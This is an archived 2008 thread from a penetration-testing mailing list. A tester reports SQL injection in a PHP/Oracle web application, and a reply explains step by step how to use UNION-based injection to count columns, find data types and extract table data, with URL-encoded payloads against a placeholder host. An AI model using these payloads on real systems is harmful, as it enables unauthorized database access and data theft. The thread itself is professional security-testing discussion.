Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: jeffrey rivero <jeffr76 () yahoo com>
Date: Fri, 18 Jan 2008 13:44:34 -0500
Hello all in your Union start by finding out how many columns there are ie. http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;-- would give you 3 columns http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;-- would give you 4 then once you have that get the data types http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;-- for the first to be a string and so on then you can start to get real data from the tables or http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;-- Jeff Clone wrote:
Hey List I am pen testing a web app that supplies sql parameters on the URL something like http://x.y.z.a/item.php?Id=90 I did blind sql injection by adding AND 1=1 to confirm the vulnerability. Now when I do http://x.y.z.a/item.php?Id=90'I getociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in item.php on line 312 Then I tried (after confirming presence of usr table name) http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;-- and I get the error ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44 I know one valid user account in the oracle DB. Any idea what's the best strategy to move forward? I'm not getting any further from here so far. Any advise / helpo would be much appreciated. Cheers' 5, 50, 500, 5000 - Store N number of mails in your inbox. Go to http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Oracle URL SQL Injection issue Clone (Jan 18)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Cesar (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Jason Thompson (Jan 22)
- Re: Oracle URL SQL Injection issue Francois Larouche (Jan 22)
- Re: Oracle URL SQL Injection issue Danux (Jan 22)
- RE: Oracle URL SQL Injection issue Thakrar, Saurabh (Jan 22)
- Re: Oracle URL SQL Injection issue David Howe (Jan 23)
- Re: Oracle URL SQL Injection issue Joe Yong (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Joxean Koret (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
(Thread continues...)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)